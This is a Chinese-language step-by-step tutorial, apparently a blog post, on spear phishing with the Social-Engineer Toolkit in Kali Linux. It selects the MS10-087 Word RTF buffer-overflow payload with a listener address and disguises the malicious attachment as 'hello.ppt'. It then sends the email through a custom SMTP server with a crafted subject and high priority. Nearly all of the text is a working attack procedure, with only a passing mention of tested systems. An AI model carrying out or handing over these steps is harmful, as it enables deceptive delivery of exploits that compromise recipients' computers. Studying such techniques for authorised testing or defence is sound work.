社会工程实战-鱼叉式钓鱼攻击

0x00 鱼叉式钓鱼攻击

攻击者通过发送带有攻击性的邮件给受害者，一旦受害者打开攻击邮件，点开攻击邮件中的附件等，就会给受害者的电脑造成一定的影响。

0x01 钓鱼攻击步骤

【Step1】

root@kali:~# setoolkit 启动SET终端
kali linux启动SET终端，出现下图。

【Step2】

set>1 选择1，社会工程学攻击

【Step3】

set>1 选择1，鱼叉式钓鱼攻击

从上图中可以看出，鱼叉式钓鱼攻击有3种：

1. 群发邮件；
2. 创建1个文件的附件；
3. 创建1个社会工程学模板。

【Step4】

set:phishing>2 选择2，即创建1个文件的附件

上图中有20多种通过附件形式进行攻击的方式，利用操作系统和软件的漏洞进行攻击，也就是说在特定的版本或系统上才出现，因此要注意被测试的系统和软件版本。

【Step5】

set:payload>6 选择6， 6) Microsoft Word RTF pFragments Stack Buffer Overflow (MS10-087)。payload选择为MS10-087

【Step6】

set:payload>4 选择4，并输入本地监听地址10.121.10.170

【Step7】

set:phishing>2 选择2，重命名文件为hello.ppt

【Step8】

set:phishing>1 选择“1”，发送单份邮件
然后
set:phishing>2 选择“2”，使用邮件发送模板
先输入email邮件主题，然后选择是以页面形式发送还是文本形式发送，此处选择p，即文本形式发送。然后输入一些邮件内容，输入完毕后按“Ctrl+C”。最后输入发送邮件的邮箱地址。如下图所示。

【Step9】

set:phishing>2 选择“2”，use your own server or open relay，使用自定义邮箱服务器
输入发送邮件的邮箱地址：[email protected]
输入发送邮件的邮箱可见名：nijunwei
输入发送邮件的邮箱名：[email protected]
输入发送邮件的邮箱密码：-------
输入发送邮箱的SMTP服务器地址：192.168.2.254
输入SMTP服务器的端口：25
是否设定邮件为高优先级：yes
是否设置监听：yes